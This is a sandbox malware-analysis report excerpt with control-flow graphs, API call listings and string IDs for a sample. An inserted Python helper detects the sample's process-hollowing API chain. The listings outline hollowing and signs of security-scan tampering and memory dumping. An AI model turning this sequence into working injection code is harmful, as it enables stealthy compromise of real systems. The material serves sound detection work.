• MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 004153A6
Similarity
• API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
• String ID:
• API String ID: 3058430110-0

APIs
                                                                                                                                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3016257755-0
                                                                                                                                      • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                                      • Instruction ID: bfd0e68975b3765f24e543ba70b005e9871d43ed2f52156b65e62ceec70126f9
                                                                                                                                      • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                                      • Instruction Fuzzy Hash: DA117E7200014EBBCF125E85CC418EE3F27BF18755B58841AFE2858130D73BCAB2AB89

                                                                                                                                      Control-flow Graph

                                                                                                                                      control_flow_graph 6798 2dc8bb0-2dc8bb3 6799 2dc8bb8-2dc8bbd 6798->6799 6799->6799 6800 2dc8bbf-2dc8ca6 call 2db493c call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 6799->6800 6831 2dc8cac-2dc8d87 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 6800->6831 6832 2dca6f7-2dca761 call 2db44d0 * 2 call 2db4c0c call 2db44d0 call 2db44ac call 2db44d0 * 2 6800->6832 6831->6832 6875 2dc8d8d-2dc90b5 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db30d4 * 2 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db4d8c call 2db4d9c call 2dc85dc 6831->6875 6984 2dc9128-2dc9449 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db46a4 * 2 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db2ee0 call 2db2f08 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 
2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 GetThreadContext 6875->6984 6985 2dc90b7-2dc9123 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 6875->6985 6984->6832 7093 2dc944f-2dc96b2 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2dc8254 6984->7093 6985->6984 7166 2dc99bf-2dc9a2b call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 7093->7166 7167 2dc96b8-2dc9821 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2dc84c4 7093->7167 7194 2dc9a30-2dc9bb0 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2dc79b4 7166->7194 7257 2dc984b-2dc98b7 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 7167->7257 7258 2dc9823-2dc9849 call 2dc79b4 7167->7258 7194->6832 7298 2dc9bb6-2dc9caf call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2dc8ac0 7194->7298 7267 2dc98bc-2dc99b3 call 2db480c 
call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2dc79b4 7257->7267 7258->7267 7337 2dc99b8-2dc99bd 7267->7337 7349 2dc9cb1-2dc9cfe call 2dc89b8 call 2dc89ac 7298->7349 7350 2dc9d03-2dca45b call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2dc7d00 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2dc7d00 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 SetThreadContext NtResumeThread call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db2c2c call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2dc87a0 * 3 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 7298->7350 7337->7194 7349->7350 7575 2dca460-2dca6f2 call 2dc87a0 * 2 call 2db480c call 2db494c call 2db4798 call 2db494c call 2dc87a0 call 2db480c call 2db494c call 2db4798 call 2db494c call 2dc87a0 * 5 call 2db480c call 2db494c 
call 2db4798 call 2db494c call 2dc87a0 call 2db480c call 2db494c call 2db4798 call 2db494c call 2dc87a0 call 2db480c call 2db494c call 2db4798 call 2db494c call 2dc87a0 call 2db480c call 2db494c call 2db4798 call 2db494c call 2dc87a0 call 2dc7ed4 call 2dc87a0 * 2 7350->7575 7575->6832
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 02DC8824: FreeLibrary.KERNEL32(02E11384,00000000,02E11388,Function_000055D8,00000004,02E11398,02E11388,05F5E0FF,00000040,02E1139C,02E11384,00000000,00000000,00000000,00000000,02DC890B), ref: 02DC88EB
                                                                                                                                        • Part of subcall function 02DC85DC: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02DC8668
                                                                                                                                      • GetThreadContext.KERNEL32(02E113D0,02E11420,ScanString,02E113A4,02DCA77C,UacInitialize,02E113A4,02DCA77C,ScanBuffer,02E113A4,02DCA77C,ScanBuffer,02E113A4,02DCA77C,UacInitialize,02E113A4), ref: 02DC9442
                                                                                                                                        • Part of subcall function 02DC8254: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02DC82C5
                                                                                                                                        • Part of subcall function 02DC84C4: NtUnmapViewOfSection.NTDLL(?,?), ref: 02DC8529
                                                                                                                                        • Part of subcall function 02DC79B4: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02DC7A27
                                                                                                                                        • Part of subcall function 02DC7D00: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02DC7D74
                                                                                                                                      • SetThreadContext.KERNEL32(02E113D0,02E11420,ScanBuffer,02E113A4,02DCA77C,ScanString,02E113A4,02DCA77C,Initialize,02E113A4,02DCA77C,02E113CC,02E114BC,02E114F8,00000004,02E114FC), ref: 02DCA157
                                                                                                                                      • NtResumeThread.NTDLL(02E113D0,00000000), ref: 02DCA164
                                                                                                                                        • Part of subcall function 02DC87A0: LoadLibraryW.KERNEL32(?,?), ref: 02DC87B4
                                                                                                                                        • Part of subcall function 02DC87A0: GetProcAddress.KERNEL32(02E11390,BCryptVerifySignature), ref: 02DC87CE
                                                                                                                                        • Part of subcall function 02DC87A0: FreeLibrary.KERNEL32(02E11390,02E11390,BCryptVerifySignature,bcrypt,?,02E113D0,00000000,02E113A4,02DCA3C7,ScanString,02E113A4,02DCA77C,ScanBuffer,02E113A4,02DCA77C,Initialize), ref: 02DC880A
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000019.00000002.2789426246.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_25_2_2db1000_Oupzhkpr.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: LibraryMemoryThreadVirtual$ContextFree$AddressAllocateCreateLoadProcProcessReadResumeSectionUnmapUserViewWrite
                                                                                                                                      • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                                                                                      • API String ID: 2388221946-51457883
                                                                                                                                      • Opcode ID: b54a6c55815c7c387bf83c0547634589a7cb6f6a6876f3ee5f77b03b4fd8fc8f
                                                                                                                                      • Instruction ID: c84339de6bcc52bb8c4f9509eab09d6d97ddcd71ed87c5ccc714d1fb6584f525
                                                                                                                                      • Opcode Fuzzy Hash: b54a6c55815c7c387bf83c0547634589a7cb6f6a6876f3ee5f77b03b4fd8fc8f
                                                                                                                                      • Instruction Fuzzy Hash: FDE20C34A50159DBDF12EB64DCB0ADE73BAFF48710F2140BAE10AAB355DA709E458F60
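The API listing of the function at 0x2DC8BB0 above records, in code order, the canonical process-hollowing chain: CreateProcessAsUserW, GetThreadContext, NtReadVirtualMemory, NtUnmapViewOfSection, NtAllocateVirtualMemory, NtWriteVirtualMemory, SetThreadContext and finally NtResumeThread, with a LoadLibraryW / GetProcAddress / FreeLibrary helper (02DC87A0) that resolves the names in the String ID field (bcrypt, dbgcore, ntdll, sppc and advapi32 exports) at run time. Note that this listing comes from the IDA plugin's static pass, so it is code order, not an execution trace. The following triage helper is an added example, not part of the Joe Sandbox report or of the sample: it parses bullet lines in this report's "APIs" format, tests them for the hollowing chain as an ordered subsequence, and splits the String ID field into module and export names. The two listings embedded below are copied from the records for 0x2DC8BB0 and 0x2DC8BAE with long argument lists shortened to "..."; the step names (create_target, write_payload, ...) and the lowercase-means-module heuristic are my own conventions.

```python
"""Triage helper for a Joe Sandbox "APIs" listing: parse the call lines and test
them for the classic process-hollowing API sequence. Added example, not report
or sample code. Sample inputs are copied from this report's function records
for 0x2DC8BB0 and 0x2DC8BAE (argument lists shortened to "...")."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Set, Tuple

# Record for 0x2DC8BB0: the complete hollowing chain plus the export-resolution helper.
LISTING_2DC8BB0 = """\
• Part of subcall function 02DC8824: FreeLibrary.KERNEL32(02E11384,...), ref: 02DC88EB
• Part of subcall function 02DC85DC: CreateProcessAsUserW.KERNEL32(?,?,...,00000000), ref: 02DC8668
• GetThreadContext.KERNEL32(02E113D0,02E11420,ScanString,...), ref: 02DC9442
• Part of subcall function 02DC8254: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02DC82C5
• Part of subcall function 02DC84C4: NtUnmapViewOfSection.NTDLL(?,?), ref: 02DC8529
• Part of subcall function 02DC79B4: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02DC7A27
• Part of subcall function 02DC7D00: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02DC7D74
• SetThreadContext.KERNEL32(02E113D0,02E11420,ScanBuffer,...), ref: 02DCA157
• NtResumeThread.NTDLL(02E113D0,00000000), ref: 02DCA164
• Part of subcall function 02DC87A0: LoadLibraryW.KERNEL32(?,?), ref: 02DC87B4
• Part of subcall function 02DC87A0: GetProcAddress.KERNEL32(02E11390,BCryptVerifySignature), ref: 02DC87CE
• Part of subcall function 02DC87A0: FreeLibrary.KERNEL32(02E11390,...), ref: 02DC880A
"""

# Record for 0x2DC8BAE: the write / set-context / resume steps are absent from its
# listing, so it must not be reported as a complete chain.
LISTING_2DC8BAE = """\
• Part of subcall function 02DC8824: FreeLibrary.KERNEL32(02E11384,...), ref: 02DC88EB
• Part of subcall function 02DC85DC: CreateProcessAsUserW.KERNEL32(?,?,...,00000000), ref: 02DC8668
• GetThreadContext.KERNEL32(02E113D0,02E11420,ScanString,...), ref: 02DC9442
• Part of subcall function 02DC8254: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02DC82C5
• Part of subcall function 02DC84C4: NtUnmapViewOfSection.NTDLL(?,?), ref: 02DC8529
• Part of subcall function 02DC79B4: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02DC7A27
"""

# One bullet line: optional "Part of subcall function <addr>:", then Api.MODULE(args), ref: <addr>
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<module>[A-Za-z0-9]+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)


@dataclass(frozen=True)
class ApiCall:
    api: str
    module: str
    args: str
    ref: str                 # address of the call instruction
    subcall: Optional[str]   # helper function that contains the call, if any


def parse_listing(text: str) -> List[ApiCall]:
    """Parse bullet lines in listing (code) order; lines that do not match are skipped."""
    calls: List[ApiCall] = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            calls.append(ApiCall(m["api"], m["module"].upper(), m["args"], m["ref"], m["sub"]))
    return calls


# Hollowing steps in order; each step accepts equivalent Win32 / Nt spellings.
HOLLOWING_STEPS: List[Tuple[str, Set[str]]] = [
    ("create_target", {"CreateProcessA", "CreateProcessW", "CreateProcessAsUserA",
                       "CreateProcessAsUserW", "NtCreateUserProcess"}),
    ("get_context",   {"GetThreadContext", "NtGetContextThread"}),
    ("unmap_image",   {"NtUnmapViewOfSection", "ZwUnmapViewOfSection"}),
    ("alloc_remote",  {"NtAllocateVirtualMemory", "VirtualAllocEx"}),
    ("write_payload", {"NtWriteVirtualMemory", "WriteProcessMemory"}),
    ("set_context",   {"SetThreadContext", "NtSetContextThread"}),
    ("resume_thread", {"NtResumeThread", "ResumeThread"}),
]


def match_hollowing(calls: List[ApiCall]) -> Dict[str, Optional[ApiCall]]:
    """Greedy ordered-subsequence match: each step must occur after the previous hit."""
    found: Dict[str, Optional[ApiCall]] = {}
    pos = 0
    for step, names in HOLLOWING_STEPS:
        hit = None
        for i in range(pos, len(calls)):
            if calls[i].api in names:
                hit, pos = calls[i], i + 1
                break
        found[step] = hit
    return found


def is_hollowing(calls: List[ApiCall]) -> bool:
    return all(match_hollowing(calls).values())


def missing_steps(calls: List[ApiCall]) -> List[str]:
    return [step for step, call in match_hollowing(calls).items() if call is None]


# The record's "String ID" field, verbatim: '$'-separated names resolved at run time.
STRING_ID = ("BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$"
             "I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$"
             "NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$"
             "OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$"
             "advapi32$bcrypt$dbgcore$ntdll$sppc")


def split_string_id(field: str) -> Tuple[List[str], List[str]]:
    """Return (modules, exports); heuristic: all-lowercase tokens are DLL base names."""
    tokens = field.split("$")
    modules = sorted(t for t in tokens if t.islower())
    exports = sorted(t for t in tokens if not t.islower())
    return modules, exports


if __name__ == "__main__":
    for name, text in (("0x2DC8BB0", LISTING_2DC8BB0), ("0x2DC8BAE", LISTING_2DC8BAE)):
        calls = parse_listing(text)
        verdict = "process hollowing chain" if is_hollowing(calls) else f"incomplete, missing {missing_steps(calls)}"
        print(f"{name}: {verdict}")
    print(split_string_id(STRING_ID))
```

Run against the two records, the first returns the full chain and the second reports write_payload, set_context and resume_thread as missing, which is exactly the difference between the two API ID fields on this page. Because the match is positional, a listing produced by a dynamic trace (where the same names may appear in a different order or be interleaved with the BCrypt / MiniDump resolution calls) should be fed in call order rather than sorted.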

                                                                                                                                      Control-flow Graph

                                                                                                                                      control_flow_graph 7653 2dc8bae-2dc8bb3 7655 2dc8bb8-2dc8bbd 7653->7655 7655->7655 7656 2dc8bbf-2dc8ca6 call 2db493c call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 7655->7656 7687 2dc8cac-2dc8d87 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 7656->7687 7688 2dca6f7-2dca761 call 2db44d0 * 2 call 2db4c0c call 2db44d0 call 2db44ac call 2db44d0 * 2 7656->7688 7687->7688 7731 2dc8d8d-2dc90b5 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db30d4 * 2 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db4d8c call 2db4d9c call 2dc85dc 7687->7731 7840 2dc9128-2dc9449 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db46a4 * 2 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db2ee0 call 2db2f08 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 
2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 GetThreadContext 7731->7840 7841 2dc90b7-2dc9123 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 7731->7841 7840->7688 7949 2dc944f-2dc96b2 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2dc8254 7840->7949 7841->7840 8022 2dc99bf-2dc9a2b call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 7949->8022 8023 2dc96b8-2dc9821 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2dc84c4 7949->8023 8050 2dc9a30-2dc9bb0 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2dc79b4 8022->8050 8113 2dc984b-2dc98b7 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 8023->8113 8114 2dc9823-2dc9849 call 2dc79b4 8023->8114 8050->7688 8154 2dc9bb6-2dc9caf call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2dc8ac0 8050->8154 8123 2dc98bc-2dc99bd call 2db480c 
call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2dc79b4 8113->8123 8114->8123 8123->8050 8205 2dc9cb1-2dc9cfe call 2dc89b8 call 2dc89ac 8154->8205 8206 2dc9d03-2dca6f2 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2dc7d00 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2dc7d00 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 SetThreadContext NtResumeThread call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db2c2c call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2dc87a0 * 3 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2dc87a0 * 2 call 2db480c call 2db494c call 2db4798 call 2db494c call 2dc87a0 call 2db480c call 2db494c call 2db4798 call 2db494c call 2dc87a0 * 5 call 2db480c call 2db494c call 2db4798 call 2db494c call 2dc87a0 call 2db480c call 2db494c call 
2db4798 call 2db494c call 2dc87a0 call 2db480c call 2db494c call 2db4798 call 2db494c call 2dc87a0 call 2db480c call 2db494c call 2db4798 call 2db494c call 2dc87a0 call 2dc7ed4 call 2dc87a0 * 2 8154->8206 8205->8206 8206->7688
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 02DC8824: FreeLibrary.KERNEL32(02E11384,00000000,02E11388,Function_000055D8,00000004,02E11398,02E11388,05F5E0FF,00000040,02E1139C,02E11384,00000000,00000000,00000000,00000000,02DC890B), ref: 02DC88EB
                                                                                                                                        • Part of subcall function 02DC85DC: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02DC8668
                                                                                                                                      • GetThreadContext.KERNEL32(02E113D0,02E11420,ScanString,02E113A4,02DCA77C,UacInitialize,02E113A4,02DCA77C,ScanBuffer,02E113A4,02DCA77C,ScanBuffer,02E113A4,02DCA77C,UacInitialize,02E113A4), ref: 02DC9442
                                                                                                                                        • Part of subcall function 02DC8254: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02DC82C5
                                                                                                                                        • Part of subcall function 02DC84C4: NtUnmapViewOfSection.NTDLL(?,?), ref: 02DC8529
                                                                                                                                        • Part of subcall function 02DC79B4: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02DC7A27
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000019.00000002.2789426246.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_25_2_2db1000_Oupzhkpr.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: MemoryVirtual$AllocateContextCreateFreeLibraryProcessReadSectionThreadUnmapUserView
                                                                                                                                      • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                                                                                      • API String ID: 3386062106-51457883
                                                                                                                                      • Opcode ID: c63d820159f8334936f469f2abe3e5a17c27431360291d65f0f4b0f2a7b7817e
                                                                                                                                      • Instruction ID: 07415b1ba36ad6bf6bb0d18f5fa88b0f10656b5e96ffe92e63214fc9d0a68078
                                                                                                                                      • Opcode Fuzzy Hash: c63d820159f8334936f469f2abe3e5a17c27431360291d65f0f4b0f2a7b7817e
                                                                                                                                      • Instruction Fuzzy Hash: E7E20C34A50159DBDF12EB64DCB0ADE73BAFF48710F2140BAE10AAB355DA709E458F60

                                                                                                                                      Control-flow Graph

                                                                                                                                      control_flow_graph 8509 2db5a78-2db5ab9 GetModuleFileNameA RegOpenKeyExA 8510 2db5afb-2db5b3e call 2db58b4 RegQueryValueExA 8509->8510 8511 2db5abb-2db5ad7 RegOpenKeyExA 8509->8511 8516 2db5b62-2db5b7c RegCloseKey 8510->8516 8517 2db5b40-2db5b5c RegQueryValueExA 8510->8517 8511->8510 8513 2db5ad9-2db5af5 RegOpenKeyExA 8511->8513 8513->8510 8514 2db5b84-2db5bb5 lstrcpyn GetThreadLocale GetLocaleInfoA 8513->8514 8518 2db5bbb-2db5bbf 8514->8518 8519 2db5c9e-2db5ca5 8514->8519 8517->8516 8520 2db5b5e 8517->8520 8521 2db5bcb-2db5be1 lstrlen 8518->8521 8522 2db5bc1-2db5bc5 8518->8522 8520->8516 8523 2db5be4-2db5be7 8521->8523 8522->8519 8522->8521 8524 2db5be9-2db5bf1 8523->8524 8525 2db5bf3-2db5bfb 8523->8525 8524->8525 8526 2db5be3 8524->8526 8525->8519 8527 2db5c01-2db5c06 8525->8527 8526->8523 8528 2db5c08-2db5c2e lstrcpyn LoadLibraryExA 8527->8528 8529 2db5c30-2db5c32 8527->8529 8528->8529 8529->8519 8530 2db5c34-2db5c38 8529->8530 8530->8519 8531 2db5c3a-2db5c6a lstrcpyn LoadLibraryExA 8530->8531 8531->8519 8532 2db5c6c-2db5c9c lstrcpyn LoadLibraryExA 8531->8532 8532->8519
                                                                                                                                      APIs
                                                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 02DB5A94
                                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02DB5AB2
                                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02DB5AD0
